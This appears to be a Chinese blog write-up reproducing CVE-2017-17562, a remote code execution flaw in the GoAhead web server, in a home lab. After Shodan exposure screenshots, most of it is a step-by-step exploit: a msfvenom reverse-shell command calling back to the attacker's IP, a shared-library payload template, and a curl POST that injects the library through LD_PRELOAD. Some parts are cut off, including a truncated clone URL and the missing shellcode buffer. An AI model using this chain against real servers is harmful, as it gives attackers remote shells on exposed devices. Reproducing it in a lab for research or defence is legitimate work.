一丶漏洞影响
GoAhea在shodan在搜索出的数量:
![GoAhea在shodan上的数量](https://img-blog.csdn.net/20171221163844019?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvdTAxMzk5MDA1MA==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
GoAhea在全球的分布情况:
![这里写图片描述](http://ban0yan.oss-cn-hangzhou.aliyuncs.com/Blog/1.png?Expires=1513851795&OSSAccessKeyId=TMP.AQGDv2HQKntyzuiBx-5fjtGrczZLwOzS26NJAMRXsqCG4JI1xRiHTKxSO1x_ADAtAhUAzsdY25KF0V0bysAbivqCCLVkrvUCFE7bq2pgZSSP0t6zuW_182_zykVp&Signature=x0HreG1LmtSwwq9TqwsWpdv45SE=)
二丶漏洞复现
原输出Hello: World!文章:https://www.elttam.com.au/blog/goahead/
POC:https://www.exploit-db.com/exploits/43360/
攻击机 windows10 IP:192.168.200.1
靶机 kali IP:192.168.200.128
搭建复现环境:
1丶下载goahead
git clone https:
2丶编译存在漏洞版本的goahead
cd goahead/
git checkout tags/v3.6.4 -q
make > /dev/null
3丶运行goahead服务
cd test
gcc ./cgitest.c -o cgi-bin/cgitest
../build/linux-x64-default/bin/goahead
4丶生成payload
用MSF生成反弹shell的shellcode
msfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.200.1 lport=4443 -f c
编译成反弹sehll的动态链接库, pyload模板:
#include <unistd.h>
#include <stdlib.h>
static void before_main(void) __attribute__((constructor));
static void before_main(void)
{
((void(*)(void))&buf)();
}
gcc -shared -fPIC ./payload.c -o payload.so -z execstack
5丶带着反弹sehll的动态链接库访问kali上的goahead
curl -X POST --data-binary @payload.so http://192.168.200.128/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head
复现过程gif:
![这里写图片描述](http://ban0yan.oss-cn-hangzhou.aliyuncs.com/Blog/CVE-2017-17562%E5%A4%8D%E7%8E%B0.gif?Expires=1513853011&OSSAccessKeyId=TMP.AQGDv2HQKntyzuiBx-5fjtGrczZLwOzS26NJAMRXsqCG4JI1xRiHTKxSO1x_ADAtAhUAzsdY25KF0V0bysAbivqCCLVkrvUCFE7bq2pgZSSP0t6zuW_182_zykVp&Signature=TS/aRsEsqTuUofpCefE6q2tUzb4=)